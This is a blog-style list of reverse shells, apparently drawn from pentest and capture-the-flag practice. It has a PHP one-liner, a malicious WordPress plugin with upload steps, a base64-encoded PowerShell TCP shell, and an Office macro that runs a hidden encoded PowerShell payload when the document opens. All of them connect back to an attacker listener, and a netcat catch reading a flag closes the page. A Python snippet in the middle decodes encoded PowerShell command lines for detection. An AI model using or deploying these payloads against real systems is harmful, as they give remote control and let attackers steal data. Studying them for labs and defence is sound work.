
Reverse shells

(a work-in-progress list of some handy reverse shells)


Opening

PHP

A generic PHP reverse shell where you can/should swap out the listening IP address and port:

<?php
// listener IP address and port go in the /dev/tcp/ path
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>

WordPress

For a WordPress plugin, you need to add a bit more info for it to load as a “valid” plugin, as outlined in the plugin development docs.

<?php
/**
 * Plugin Name: reverse shell plugin
 * Description: opens a reverse shell with bash
 * Version: 0.1
 * Author: some-natalie
 * Author URI: https://some-natalie.dev
 */

// listener IP address and port go in the /dev/tcp/ path
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>

Zip that PHP file, then upload the zipped file as a plugin.

This lovely malicious WordPress plugin generator works well on some versions of WordPress and not others. The boring one above works a bit more uniformly, but is nowhere near as full of features.

PowerShell

Edit the IP address and port, then encode it to base64 for easy copy/paste:

$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.236",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText = [Convert]::ToBase64String($Bytes)

$EncodedText
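From the defender's side, that same encoding is what shows up in a process-creation log, so here is an added example (mine, not from this post) that reverses it: it pulls the base64 argument out of a command line, decodes the UTF-16LE text, and lists which strings from the one-liner above appear in it. The log line format and the `-e`/`-ec`/`-enc`/`-EncodedCommand` flag spellings are assumptions, and the sample lines are constructed in the script.

```python
import base64
import re

# Strings the PowerShell one-liner above leaves in its decoded form. This is a
# starting list for triage, not an exhaustive signature set.
INDICATORS = ("TCPClient", "GetStream", "iex ", "Invoke-Expression", "/dev/tcp/", "powercat")

# Assumed flag spellings: powershell.exe accepts -e, -ec, -enc or the full -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(command_line):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE; still odd, but not decodable here


def classify(command_line):
    """Decode the command line and list which indicators appear in it."""
    decoded = decode_encoded_command(command_line)
    if decoded is None:
        return {"decoded": None, "hits": []}
    lowered = decoded.lower()
    return {"decoded": decoded, "hits": [i for i in INDICATORS if i.lower() in lowered]}


def encode_for_sample(text):
    """Build constructed sample data the same way the snippet above does."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed process-creation log lines (hypothetical format, not real telemetry).
SAMPLE_LOGS = [
    "CommandLine: powershell.exe -nop -w hidden -e "
    + encode_for_sample('$client = New-Object System.Net.Sockets.TCPClient("10.0.0.5",4444);'
                        '$stream = $client.GetStream()'),
    "CommandLine: powershell.exe -EncodedCommand "
    + encode_for_sample("Get-Service | Where-Object Status -eq Running"),
    "CommandLine: powershell.exe -nop -c Get-Date",
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        result = classify(line)
        print("hits:", result["hits"] or "none", "|", (result["decoded"] or "<not encoded>")[:60])
```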

Office Macro

Here’s a basic macro that invokes powercat to create a reverse shell. Getting everything right for that payload is tedious, so I made a quick script (payload.py) to create the base64-encoded payload for a simple reverse shell. Then paste that content into the macro below. Make sure to save the macro attached to the document (not the workspace). Use .docm or .doc for Word, and the equivalent macro-enabled format for other Office applications.

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    ' edit the payload.py inputs to produce the right output here
    Str = Str + "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAd"
    Str = Str + "uAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA"
    Str = Str + "CAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGw"
    Str = Str + "A"
    CreateObject("Wscript.Shell").Run Str
End Sub

Catching

netcat

ᐅ nc -l 8080
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8b8f280a8848:/var/www/html/wp-admin$ cat /tmp/flag
cat /tmp/flag
flag{a sneaky flag has appeared}
This post is licensed under CC BY 4.0 by the author.